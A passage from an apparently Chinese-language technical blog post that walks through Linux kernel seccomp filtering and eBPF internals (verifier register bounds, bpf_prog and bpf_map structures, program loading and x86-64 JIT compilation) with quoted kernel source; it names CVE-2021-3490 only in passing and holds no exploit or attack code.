 * Install a user-supplied seccomp filter on the current task (excerpt; the
 * "......" line marks code omitted by the article).
 *
 * Visible flow: prepare the filter, optionally reserve an fd and create a
 * listener file (SECCOMP_FILTER_FLAG_NEW_LISTENER), take the locks, attach
 * the filter and switch the task to filter mode, then unwind. On success
 * with a listener the return value is the listener fd; otherwise ret.
 */
static long seccomp_set_mode_filter(unsigned int flags,
const char __user *filter)
{
const unsigned long seccomp_mode = SECCOMP_MODE_FILTER;
struct seccomp_filter *prepared = NULL;
long ret = -EINVAL;
int listener = -1;
struct file *listener_f = NULL;

......

prepared = seccomp_prepare_user_filter(filter); /* prepare the new filter before taking any locks */
if (IS_ERR(prepared))
return PTR_ERR(prepared);

if (flags & SECCOMP_FILTER_FLAG_NEW_LISTENER) {
listener = get_unused_fd_flags(O_CLOEXEC);
if (listener < 0) {
ret = listener;
goto out_free;
}

listener_f = init_listener(prepared); /* create the listener file for this filter */
if (IS_ERR(listener_f)) {
put_unused_fd(listener);
ret = PTR_ERR(listener_f);
goto out_free;
}
}

if (flags & SECCOMP_FILTER_FLAG_TSYNC &&
mutex_lock_killable(&current->signal->cred_guard_mutex))
goto out_put_fd;

spin_lock_irq(&current->sighand->siglock);

if (!seccomp_may_assign_mode(seccomp_mode))
goto out;

if (has_duplicate_listener(prepared)) { /* refuse with -EBUSY if a listener already exists */
ret = -EBUSY;
goto out;
}

ret = seccomp_attach_filter(flags, prepared); /* attach the prepared filter to the current task */
if (ret)
goto out;
/* Do not free the successfully attached filter. */
prepared = NULL;

seccomp_assign_mode(current, seccomp_mode, flags); /* put the current task into seccomp filter mode */
out:
spin_unlock_irq(&current->sighand->siglock);
if (flags & SECCOMP_FILTER_FLAG_TSYNC)
mutex_unlock(&current->signal->cred_guard_mutex);
out_put_fd:
if (flags & SECCOMP_FILTER_FLAG_NEW_LISTENER) {
if (ret) {
listener_f->private_data = NULL;
fput(listener_f); /* drop our reference to the listener file */
put_unused_fd(listener); /* give back the reserved fd that was never installed */
seccomp_notify_detach(prepared);
} else {
fd_install(listener, listener_f);
ret = listener;
}
}
out_free:
seccomp_filter_free(prepared);
return ret;
}
  • 其最核心的工作就是在 current->seccomp.filter 中注册过滤器:
1
2
3
filter->prev = current->seccomp.filter;
current->seccomp.filter = filter;
atomic_inc(&current->seccomp.filter_count);

如果使用了 FILTER 模式,则调用 seccomp_run_filters 函数来进行所有指令判断过滤,系统调用号作为参数传递,根据返回值来进行后续处理

这里我们分析一下从 syscall 入口函数 entry_SYSCALL_compat 到 seccomp_run_filters 的调用链:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
SYM_CODE_START(entry_SYSCALL_compat)
UNWIND_HINT_EMPTY
/* Interrupts are off on entry. */
swapgs

/* Stash user ESP */
movl %esp, %r8d

/* Use %rsp as scratch reg. User ESP is stashed in r8 */
SWITCH_TO_KERNEL_CR3 scratch_reg=%rsp
......
movq %rsp, %rdi
call do_fast_syscall_32
......
SWITCH_TO_USER_CR3_NOSTACK scratch_reg=%r8 scratch_reg2=%r9

xorl %r8d, %r8d
xorl %r9d, %r9d
xorl %r10d, %r10d
swapgs
sysretl
SYM_CODE_END(entry_SYSCALL_compat)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static noinstr bool __do_fast_syscall_32(struct pt_regs *regs)
{
unsigned int nr = syscall_32_enter(regs);
int res;

......

/* The case truncates any ptrace induced syscall nr > 2^32 -1 */
nr = (unsigned int)syscall_enter_from_user_mode_work(regs, nr);

/* Now this is just like a normal syscall. */
do_syscall_32_irqs_on(regs, nr);
syscall_exit_to_user_mode(regs);
return true;
}
1
2
3
4
long syscall_enter_from_user_mode_work(struct pt_regs *regs, long syscall)
{
return __syscall_enter_from_user_work(regs, syscall);
}
1
2
3
4
5
6
7
8
9
10
11
static __always_inline long
__syscall_enter_from_user_work(struct pt_regs *regs, long syscall)
{
unsigned long ti_work;

ti_work = READ_ONCE(current_thread_info()->flags);
if (ti_work & SYSCALL_ENTER_WORK)
syscall = syscall_trace_enter(regs, syscall, ti_work);

return syscall;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static long syscall_trace_enter(struct pt_regs *regs, long syscall,
unsigned long ti_work)
{
long ret = 0;

......

if (ti_work & _TIF_SECCOMP) {
ret = __secure_computing(NULL);
if (ret == -1L)
return ret;
}

......

return ret ? : syscall;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
int __secure_computing(const struct seccomp_data *sd)
{
int mode = current->seccomp.mode;
int this_syscall;

if (IS_ENABLED(CONFIG_CHECKPOINT_RESTORE) &&
unlikely(current->ptrace & PT_SUSPEND_SECCOMP))
return 0;

this_syscall =
sd ? sd->nr : syscall_get_nr(current, task_pt_regs(current));

switch (mode) {
case SECCOMP_MODE_STRICT:
__secure_computing_strict(this_syscall); /* may call do_exit */
return 0;
case SECCOMP_MODE_FILTER:
return __seccomp_filter(this_syscall, sd, false);
default:
BUG();
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static int __seccomp_filter(int this_syscall, const struct seccomp_data *sd,
const bool recheck_after_trace)
{
u32 filter_ret, action;
struct seccomp_filter *match = NULL;
int data;
struct seccomp_data sd_local;

rmb();

if (!sd) {
populate_seccomp_data(&sd_local);
sd = &sd_local;
}

filter_ret = seccomp_run_filters(sd, &match);

......

skip:
seccomp_log(this_syscall, 0, action, match ? match->log : false);
return -1;
}

指令过滤函数 seccomp_run_filters 的源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/*
 * Run every filter attached to the current task against sd.
 *
 * Walks the filter list through f->prev and keeps the result whose action
 * part (ACTION_ONLY) is numerically lowest; *match is set to the filter that
 * produced it. Returns SECCOMP_RET_ALLOW if no filter returns a lower
 * action, and SECCOMP_RET_KILL_PROCESS if the task has no filter at all.
 */
static u32 seccomp_run_filters(const struct seccomp_data *sd,
struct seccomp_filter **match)
{
u32 ret = SECCOMP_RET_ALLOW;
/* Make sure cross-thread synced filter points somewhere sane. */
struct seccomp_filter *f = READ_ONCE(current->seccomp.filter);

/* Ensure unexpected behavior doesn't result in failing open. */
if (WARN_ON(f == NULL))
return SECCOMP_RET_KILL_PROCESS;

/*
* All filters in the list are evaluated and the lowest BPF return
* value always takes priority (ignoring the DATA).
*/
for (; f; f = f->prev) {
u32 cur_ret = bpf_prog_run_pin_on_cpu(f->prog, sd); /* run this filter's BPF program on sd */

if (ACTION_ONLY(cur_ret) < ACTION_ONLY(ret)) {
ret = cur_ret;
*match = f;
}
}
return ret;
}
  • bpf_prog_run_pin_on_cpu 是一个用于运行 BPF 程序的函数:它先禁止当前任务被迁移到其他 CPU,在当前 CPU 上执行 BPF 程序,执行完毕后再重新允许迁移
1
2
3
4
5
6
7
8
9
10
/*
 * Run prog on ctx with migration disabled for the duration of the run, and
 * return the program's result.
 */
static inline u32 bpf_prog_run_pin_on_cpu(const struct bpf_prog *prog,
const void *ctx)
{
u32 ret;

migrate_disable(); /* keep the current task from migrating to another CPU */
ret = __BPF_PROG_RUN(prog, ctx, bpf_dispatcher_nop_func); /* run the BPF program */
migrate_enable(); /* allow migration again */
return ret;
}

eBPF 虚拟机

Linux 下 eBPF 的整体架构如下图所示:

  • 传入:用户进程首先在用户空间编写相应的 BPF 字节码程序,传入内核
  • 检查:内核通过 verifier 对字节码程序进行安全性检查
  • 编译 or 解释:通过检查后便通过 JIT 编译运行,或者直接解释运行 BPF 字节码
  • 映射:用以保存数据的通用结构,可以在不同的 eBPF 程序之间或是用户进程与内核间共享数据(不同的 eBPF 程序之间可以共享同一个映射)

eBPF 底层是一个使用 RISC 指令集的虚拟机,使用11个64位寄存器和一个固定大小为512字节的栈:

  • 其中10个寄存器(R0 ~ R9)是通用寄存器
  • 一个只读栈帧寄存器

寄存器总是64位大小;执行32位运算时只使用低32位子寄存器,写入结果时高32位会被置零,这也为 eBPF 提供了交叉编译的兼容性。以 x86-64 的 JIT 为例,各个寄存器与硬件寄存器的对应关系及功能如下:

  • R0: RAX,存放函数返回值或程序退出状态码
  • R1: RDI,第一个实参
  • R2: RSI,第二个实参
  • R3: RDX,第三个实参
  • R4: RCX,第四个实参
  • R5: R8,第五个实参
  • R6: RBX,callee saved
  • R7: R13,callee saved
  • R8: R14,callee saved
  • R9: R15,callee saved
  • R10: RBP,只读栈帧

在 eBPF 中,一个寄存器的状态信息使用 bpf_reg_state 进行表示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
/*
 * Verifier-side state tracked for a single BPF register: its type, the
 * pointer-specific data in the union, the tnum (var_off) describing the
 * known bits, and the signed/unsigned 64-bit and 32-bit min/max bounds.
 */
struct bpf_reg_state {
/* Ordering of fields matters. See states_equal() */
enum bpf_reg_type type; /* register type */
/* Fixed part of pointer offset, pointer types only */
s32 off;
union {
/* valid when type == PTR_TO_PACKET */
int range;

/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
* PTR_TO_MAP_VALUE_OR_NULL
*/
struct bpf_map *map_ptr;

/* for PTR_TO_BTF_ID */
struct {
struct btf *btf;
u32 btf_id;
};

u32 mem_size; /* for PTR_TO_MEM | PTR_TO_MEM_OR_NULL */

/* Max size from any of the above. */
struct {
unsigned long raw1;
unsigned long raw2;
} raw;
};
/* For PTR_TO_PACKET, used to find other pointers with the same variable
* offset, so they can share range knowledge.
* For PTR_TO_MAP_VALUE_OR_NULL this is used to share which map value we
* came from, when one is tested for != NULL.
* For PTR_TO_MEM_OR_NULL this is used to identify memory allocation
* for the purpose of tracking that it's freed.
* For PTR_TO_SOCKET this is used to share which pointers retain the
* same reference to the socket, to determine proper reference freeing.
*/
u32 id;
/* PTR_TO_SOCKET and PTR_TO_TCP_SOCK could be a ptr returned
* from a pointer-cast helper, bpf_sk_fullsock() and
* bpf_tcp_sock().
*
* Consider the following where "sk" is a reference counted
* pointer returned from "sk = bpf_sk_lookup_tcp();":
*
* 1: sk = bpf_sk_lookup_tcp();
* 2: if (!sk) { return 0; }
* 3: fullsock = bpf_sk_fullsock(sk);
* 4: if (!fullsock) { bpf_sk_release(sk); return 0; }
* 5: tp = bpf_tcp_sock(fullsock);
* 6: if (!tp) { bpf_sk_release(sk); return 0; }
* 7: bpf_sk_release(sk);
* 8: snd_cwnd = tp->snd_cwnd; // verifier will complain
*
* After bpf_sk_release(sk) at line 7, both "fullsock" ptr and
* "tp" ptr should be invalidated also. In order to do that,
* the reg holding "fullsock" and "sk" need to remember
* the original refcounted ptr id (i.e. sk_reg->id) in ref_obj_id
* such that the verifier can reset all regs which have
* ref_obj_id matching the sk_reg->id.
*
* sk_reg->ref_obj_id is set to sk_reg->id at line 1.
* sk_reg->id will stay as NULL-marking purpose only.
* After NULL-marking is done, sk_reg->id can be reset to 0.
*
* After "fullsock = bpf_sk_fullsock(sk);" at line 3,
* fullsock_reg->ref_obj_id is set to sk_reg->ref_obj_id.
*
* After "tp = bpf_tcp_sock(fullsock);" at line 5,
* tp_reg->ref_obj_id is set to fullsock_reg->ref_obj_id
* which is the same as sk_reg->ref_obj_id.
*
* From the verifier perspective, if sk, fullsock and tp
* are not NULL, they are the same ptr with different
* reg->type. In particular, bpf_sk_release(tp) is also
* allowed and has the same effect as bpf_sk_release(sk).
*/
u32 ref_obj_id;
/* For scalar types (SCALAR_VALUE), this represents our knowledge of
* the actual value.
* For pointer types, this represents the variable part of the offset
* from the pointed-to object, and is shared with all bpf_reg_states
* with the same id as us.
*/
struct tnum var_off;
/* Used to determine if any memory access using this register will
* result in a bad access.
* These refer to the same value as var_off, not necessarily the actual
* contents of the register.
*/
s64 smin_value; /* minimum possible (s64)value */
s64 smax_value; /* maximum possible (s64)value */
u64 umin_value; /* minimum possible (u64)value */
u64 umax_value; /* maximum possible (u64)value */
/* 32-bit bounds: per this write-up, these are the bounds CVE-2021-3490 leaves stale */
s32 s32_min_value; /* minimum possible (s32)value */
s32 s32_max_value; /* maximum possible (s32)value */
u32 u32_min_value; /* minimum possible (u32)value */
u32 u32_max_value; /* maximum possible (u32)value */
/* parentage chain for liveness checking */
struct bpf_reg_state *parent;
/* Inside the callee two registers can be both PTR_TO_STACK like
* R1=fp-8 and R2=fp-8, but one of them points to this function stack
* while another to the caller's stack. To differentiate them 'frameno'
* is used which is an index in bpf_verifier_state->frame[] array
* pointing to bpf_func_state.
*/
u32 frameno;
/* Tracks subreg definition. The stored value is the insn_idx of the
* writing insn. This is safe because subreg_def is used before any insn
* patching which only happens after main verification finished.
*/
s32 subreg_def;
enum bpf_reg_liveness live;
/* if (!precise && SCALAR_VALUE) min/max/tnum don't affect safety */
bool precise;
};

当 eBPF 字节码载入到内核中后,verifier 会对 eBPF 字节码进行一系列的检查,主要关注以下几个字段:

  • smin_value、smax_value:64 位有符号的值的可能取值边界
  • umin_value、umax_value:64 位无符号的值的可能取值边界
  • s32_min_value、s32_max_value:32 位有符号的值的可能取值边界
  • u32_min_value、u32_max_value:32 位无符号的值的可能取值边界

核心检查函数就是 bpf_check,一个静态代码分析器:

  • 逐条遍历 eBPF 程序中的指令并更新寄存器 / 堆栈的状态,条件分支的所有路径都会被分析,直到 bpf_exit 指令
  • 这其实是一个模拟执行的过程,verifier 会推测寄存器的边界值,检查其是否符合规则
  • 模拟通过后才能正常加载 eBPF 程序

在其中用于检测指令合法性的函数为 do_check,该函数会遍历每一条指令并根据指令的不同类型进行不同操作,对于算术指令(BPF_ALU / BPF_ALU64)而言有如下调用链

1
2
3
4
do_check()        					// 遍历每一条指令并根据类型调用相应函数处理
->check_alu_op() // 根据算术指令的opcode进行不同处理
->adjust_reg_min_max_vals() // 计算新的寄存器边界值
->adjust_scalar_min_max_vals() // 根据opcode计算具体的新边界值

当 eBPF 字节码载入到内核中后,内核最终会使用一个 bpf_prog 结构体来表示一个 eBPF 程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
 * In-kernel representation of one loaded BPF program: bookkeeping flags,
 * program/attach type, lengths, the function pointer used to run it, and
 * the trailing instruction array.
 */
struct bpf_prog {
u16 pages; /* Number of allocated pages */
u16 jited:1, /* Is our filter JIT'ed? */
jit_requested:1,/* archs need to JIT the prog */
gpl_compatible:1, /* Is filter GPL compatible? */
cb_access:1, /* Is control block accessed? */
dst_needed:1, /* Do we need dst entry? */
blinded:1, /* Was blinded */
is_func:1, /* program is a bpf function */
kprobe_override:1, /* Do we override a kprobe? */
has_callchain_buf:1, /* callchain buffer allocated? */
enforce_expected_attach_type:1, /* Enforce expected_attach_type checking at attach time */
call_get_stack:1; /* Do we call bpf_get_stack() or bpf_get_stackid() */
enum bpf_prog_type type; /* Type of BPF program */
enum bpf_attach_type expected_attach_type; /* For some prog types */
u32 len; /* Number of filter blocks */
u32 jited_len; /* Size of jited insns in bytes */
u8 tag[BPF_TAG_SIZE];
struct bpf_prog_aux *aux; /* Auxiliary fields */
struct sock_fprog_kern *orig_prog; /* Original BPF program */
/* Function pointer taking the context and the instruction array */
unsigned int (*bpf_func)(const void *ctx,
const struct bpf_insn *insn);
/* Instructions for interpreter */
struct sock_filter insns[0];
struct bpf_insn insnsi[];
};

接着就是编译,解释 eBPF 字节码,生成 bpf map 并记录在 bpf_reg_state->map_ptr

bpf map 是一个通用的用以储存不同种类数据的结构,用以在用户进程与 eBPF 程序、eBPF 程序与 eBPF 程序之间进行数据共享(这些数据以二进制形式储存,因此用户在创建时只需要指定 key 与 value 的 size)

核心结构体 bpf_map 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/*
 * Common header shared by BPF maps: the ops table, the geometry of the
 * map (type, key/value size, max entries, flags), BTF/naming metadata and
 * the reference counters.
 */
struct bpf_map {
/* The first two cachelines with read-mostly members of which some
* are also accessed in fast-path (e.g. ops, max_entries).
*/
const struct bpf_map_ops *ops ____cacheline_aligned;
struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
void *security;
#endif
enum bpf_map_type map_type; /* data-structure type of the map */
u32 key_size; /* size in bytes of the key that indexes an element */
u32 value_size; /* size in bytes of each element's value */
u32 max_entries; /* maximum number of entries in the map */
u32 map_flags; /* flags describing special properties of the map (e.g. whether all of its memory should be preallocated) */
int spin_lock_off; /* >=0 valid offset, <0 error */
u32 id;
int numa_node;
u32 btf_key_type_id;
u32 btf_value_type_id;
struct btf *btf;
#ifdef CONFIG_MEMCG_KMEM
struct mem_cgroup *memcg;
#endif
char name[BPF_OBJ_NAME_LEN];
u32 btf_vmlinux_value_type_id;
bool bypass_spec_v1;
bool frozen; /* write-once; write-protected by freeze_mutex */
/* 22 bytes hole */

/* The 3rd and 4th cacheline with misc members to avoid false sharing
* particularly with refcounting.
*/
atomic64_t refcnt ____cacheline_aligned;
atomic64_t usercnt;
struct work_struct work;
struct mutex freeze_mutex;
u64 writecnt; /* writable mmap cnt; protected by freeze_mutex */
};

bpf map 有多种类型,记录于 bpf_map_type 枚举中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/* Enumerates the kinds of BPF map; stored in bpf_map.map_type. */
enum bpf_map_type {
BPF_MAP_TYPE_UNSPEC,
BPF_MAP_TYPE_HASH, /* key/value pairs stored in a hash table (the most common type) */
BPF_MAP_TYPE_ARRAY, /* key/value pairs stored as an array; the key is the array index, values are initialised to '0' */
BPF_MAP_TYPE_PROG_ARRAY, /* special array map whose values are file descriptors of other eBPF programs */
BPF_MAP_TYPE_PERF_EVENT_ARRAY,
BPF_MAP_TYPE_PERCPU_HASH,
BPF_MAP_TYPE_PERCPU_ARRAY,
BPF_MAP_TYPE_STACK_TRACE,
BPF_MAP_TYPE_CGROUP_ARRAY,
BPF_MAP_TYPE_LRU_HASH,
BPF_MAP_TYPE_LRU_PERCPU_HASH,
BPF_MAP_TYPE_LPM_TRIE,
BPF_MAP_TYPE_ARRAY_OF_MAPS,
BPF_MAP_TYPE_HASH_OF_MAPS,
BPF_MAP_TYPE_DEVMAP,
BPF_MAP_TYPE_SOCKMAP,
BPF_MAP_TYPE_CPUMAP,
BPF_MAP_TYPE_XSKMAP,
BPF_MAP_TYPE_SOCKHASH,
BPF_MAP_TYPE_CGROUP_STORAGE,
BPF_MAP_TYPE_REUSEPORT_SOCKARRAY,
BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE,
BPF_MAP_TYPE_QUEUE,
BPF_MAP_TYPE_STACK, /* data stored as a stack */
BPF_MAP_TYPE_SK_STORAGE,
BPF_MAP_TYPE_DEVMAP_HASH,
BPF_MAP_TYPE_STRUCT_OPS,
BPF_MAP_TYPE_RINGBUF,
BPF_MAP_TYPE_INODE_STORAGE,
BPF_MAP_TYPE_TASK_STORAGE,
};

Seccomp BPF

柏克莱封包过滤器(Berkeley Packet Filter,缩写 BPF),是类 Unix 系统上数据链路层的一种原始接口,提供原始链路层封包的收发,除此之外,如果网卡驱动支持混杂模式(promiscuous mode),那么它可以让网卡处于此种模式,这样可以收到网络上的所有包,不管他们的目的地是不是所在主机

Seccomp BPF 是一种基于 Linux 内核的 BPF 过滤器,用于对 Linux 进程的系统调用进行过滤和拦截(seccomp 过滤器使用的是经典 BPF,即 cBPF 指令集,内核在加载时会将其转换为 eBPF 再执行)

BPF 的指令集比较简单,开发人员定义了符号常量和两个方便的宏 BPF_STMT 和 BPF_JUMP,可以用来方便地编写 BPF 规则

1
BPF_STMT(BPF_LD | BPF_W | BPF_ABS,(offsetof(struct seccomp_data, arch)))
  • BPF_LD:建一个 BPF 加载操作
  • BPF_W:操作数大小是一个字
  • BPF_ABS:使用绝对偏移,即使用指令中的值作为数据区的偏移量,该值是体系结构字段与数据区域的偏移量
  • offsetof():生成数据区域中期望字段的偏移量
1
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K ,AUDIT_ARCH_X86_64 , 1, 0)
  • BPF_JMP | BPF_JEQ 会创建一个相等跳转指令,BPF_K 表示比较对象是指令中的常量(即第二个参数 AUDIT_ARCH_X86_64),它将累加器中的值与该常量进行比较,判断是否相等
    • 如果架构是 x86_64 则跳过下一条指令(jt=1,代表测试为真,跳过一条指令)
    • 否则将执行下一条指令(jf=0,代表测试为假,继续执行下一条指令)

用户编写的 eBPF 程序最终会被编译成 eBPF 字节码,eBPF 字节码使用 bpf_insn 结构来表示,如下:

1
2
3
4
5
6
7
/* Encoding of a single eBPF instruction. */
struct bpf_insn {
__u8 code; /* opcode */
__u8 dst_reg:4; /* destination register */
__u8 src_reg:4; /* source register */
__s16 off; /* offset */
__s32 imm; /* immediate operand */
};

eBPF 程序会被 LLVM/Clang 编译成 bpf_insn 结构数组,这里使用了 JIT 即时编译技术(PS:当 eBPF 字节码被加载到内核时,内核会根据是否开启了 JIT 功能选项,来决定是否将 eBPF 字节码编译成机器码)

内核通过 bpf_prog_load 函数来加载 eBPF 字节码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/*
 * Excerpt of the program-load path (the article elides parts, marked by
 * the "......" lines): allocate a bpf_prog, run the verifier on it, select
 * the runtime, then allocate an id and a file descriptor for it.
 * Returns the value of bpf_prog_new_fd() on success or a negative error.
 */
static int bpf_prog_load(union bpf_attr *attr, union bpf_attr __user *uattr)
{
enum bpf_prog_type type = attr->prog_type;
struct bpf_prog *prog; /* holds the eBPF program's information */
int err;
char license[128];
bool is_gpl;

......

/* plain bpf_prog allocation */
prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER); /* allocate the bpf_prog structure */
if (!prog)
return -ENOMEM;

......

/* run eBPF verifier */
err = bpf_check(&prog, attr, uattr);
if (err < 0)
goto free_used_maps;

prog = bpf_prog_select_runtime(prog, &err); /* decide whether to JIT-compile, and do so */
if (err < 0)
goto free_used_maps;

err = bpf_prog_alloc_id(prog);
if (err)
goto free_used_maps;

bpf_prog_kallsyms_add(prog);
perf_event_bpf_event(prog, PERF_BPF_EVENT_PROG_LOAD, 0);
bpf_audit_prog(prog, BPF_AUDIT_LOAD);

err = bpf_prog_new_fd(prog);
if (err < 0)
bpf_prog_put(prog);
return err;

free_used_maps:
/* In case we have subprogs, we need to wait for a grace
* period before we can tear down JIT memory since symbols
* are already exposed under kallsyms.
*/
__bpf_prog_put_noref(prog, prog->aux->func_cnt);
return err;
/* The labels below are targeted from the elided portions of the function */
free_prog:
bpf_prog_uncharge_memlock(prog);
free_prog_sec:
security_bpf_prog_free(prog->aux);
free_prog_nouncharge:
bpf_prog_free(prog);
return err;
}
  • 函数 bpf_prog_load 会调用 bpf_prog_select_runtime 函数来判断是否使用 JIT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
/*
 * Choose how @fp will be executed. If bpf_func is already set, go straight
 * to finalisation; otherwise pick the interpreter function and, for
 * programs that are not device-bound, attempt JIT compilation (device-bound
 * programs go through bpf_prog_offload_compile() instead).
 * The status is written to *@err; the (possibly replaced) program is
 * returned.
 */
struct bpf_prog *bpf_prog_select_runtime(struct bpf_prog *fp, int *err)
{
if (fp->bpf_func)
goto finalize;

bpf_prog_select_func(fp);

if (!bpf_prog_is_dev_bound(fp->aux)) {
*err = bpf_prog_alloc_jited_linfo(fp);
if (*err)
return fp;

fp = bpf_int_jit_compile(fp); /* compile the eBPF bytecode to machine code when JIT is requested */
if (!fp->jited) {
bpf_prog_free_jited_linfo(fp);
#ifdef CONFIG_BPF_JIT_ALWAYS_ON
*err = -ENOTSUPP;
return fp;
#endif
} else {
bpf_prog_free_unused_jited_linfo(fp);
}
} else {
*err = bpf_prog_offload_compile(fp);
if (*err)
return fp;
}

finalize:
bpf_prog_lock_ro(fp);

*err = bpf_check_tail_call(fp);

return fp;
}
EXPORT_SYMBOL_GPL(bpf_prog_select_runtime);
  • 对于不同的架构,函数 bpf_int_jit_compile 有不同的实现
  • 这里我们只分析 x86_64 架构下的 bpf_int_jit_compile
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
/*
 * x86-64 JIT entry point. Repeatedly calls do_jit() until the generated
 * image size stops changing, allocates the executable image, emits the
 * final code into it and points prog->bpf_func at the result.
 * On any failure the original program (@orig_prog) is returned unchanged.
 */
struct bpf_prog *bpf_int_jit_compile(struct bpf_prog *prog)
{
struct bpf_binary_header *header = NULL;
struct bpf_prog *tmp, *orig_prog = prog;
struct x64_jit_data *jit_data;
int proglen, oldproglen = 0;
struct jit_context ctx = {};
bool tmp_blinded = false;
bool extra_pass = false;
u8 *image = NULL;
int *addrs;
int pass;
int i;

if (!prog->jit_requested) /* JIT was not requested for this program */
return orig_prog;

tmp = bpf_jit_blind_constants(prog);
/*
* If blinding was requested and we failed during blinding,
* we must fall back to the interpreter.
*/
if (IS_ERR(tmp))
return orig_prog;
if (tmp != prog) {
tmp_blinded = true;
prog = tmp;
}

jit_data = prog->aux->jit_data;
if (!jit_data) {
jit_data = kzalloc(sizeof(*jit_data), GFP_KERNEL);
if (!jit_data) {
prog = orig_prog;
goto out;
}
prog->aux->jit_data = jit_data;
}
addrs = jit_data->addrs;
if (addrs) {
ctx = jit_data->ctx;
oldproglen = jit_data->proglen;
image = jit_data->image;
header = jit_data->header;
extra_pass = true;
goto skip_init_addrs;
}
addrs = kmalloc_array(prog->len + 1, sizeof(*addrs), GFP_KERNEL);
if (!addrs) {
prog = orig_prog;
goto out_addrs;
}

/*
* Before first pass, make a rough estimation of addrs[]
* each BPF instruction is translated to less than 64 bytes
*/
for (proglen = 0, i = 0; i <= prog->len; i++) {
proglen += 64;
addrs[i] = proglen;
}
ctx.cleanup_addr = proglen;
skip_init_addrs:

/*
* JITed image shrinks with every pass and the loop iterates
* until the image stops shrinking. Very large BPF programs
* may converge on the last pass. In such case do one more
* pass to emit the final image.
*/
for (pass = 0; pass < 20 || image; pass++) {
proglen = do_jit(prog, addrs, image, oldproglen, &ctx); /* translate the eBPF bytecode into native machine code */
if (proglen <= 0) {
out_image:
image = NULL;
if (header)
bpf_jit_binary_free(header);
prog = orig_prog;
goto out_addrs;
}
if (image) {
if (proglen != oldproglen) {
pr_err("bpf_jit: proglen=%d != oldproglen=%d\n",
proglen, oldproglen);
goto out_image;
}
break;
}
if (proglen == oldproglen) {
u32 align = __alignof__(struct exception_table_entry);
u32 extable_size = prog->aux->num_exentries *
sizeof(struct exception_table_entry);

/* allocate module memory for x86 insns and extable */
header = bpf_jit_binary_alloc(roundup(proglen, align) + extable_size,
&image, align, jit_fill_hole);
if (!header) {
prog = orig_prog;
goto out_addrs;
}
prog->aux->extable = (void *) image + roundup(proglen, align);
}
oldproglen = proglen;
cond_resched();
}

if (bpf_jit_enable > 1)
bpf_jit_dump(prog->len, proglen, pass + 1, image); /* dump the machine code generated from the eBPF bytecode */

if (image) {
if (!prog->is_func || extra_pass) {
bpf_tail_call_direct_fixup(prog);
bpf_jit_binary_lock_ro(header);
} else {
jit_data->addrs = addrs;
jit_data->ctx = ctx;
jit_data->proglen = proglen;
jit_data->image = image;
jit_data->header = header;
}
prog->bpf_func = (void *)image; /* make the compiled machine code the program's entry point */
prog->jited = 1;
prog->jited_len = proglen;
} else {
prog = orig_prog;
}

if (!image || !prog->is_func || extra_pass) {
if (image)
bpf_prog_fill_jited_linfo(prog, addrs + 1);
out_addrs:
kfree(addrs);
kfree(jit_data);
prog->aux->jit_data = NULL;
}
out:
if (tmp_blinded)
bpf_jit_prog_release_other(prog, prog == orig_prog ?
tmp : orig_prog);
return prog;
}

当函数 do_jit 将 eBPF 字节码编译为本地机器码后,可以直接调用 prog->bpf_func 来执行这段机器码

当没有使用 JIT、内核需要解释执行 eBPF 字节码时,prog->bpf_func 指向的是解释器入口 __bpf_prog_runN(N 为 stack size),这些不同 stack size 的入口函数最终都会调用 BPF 解释器的核心函数 ___bpf_prog_run:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
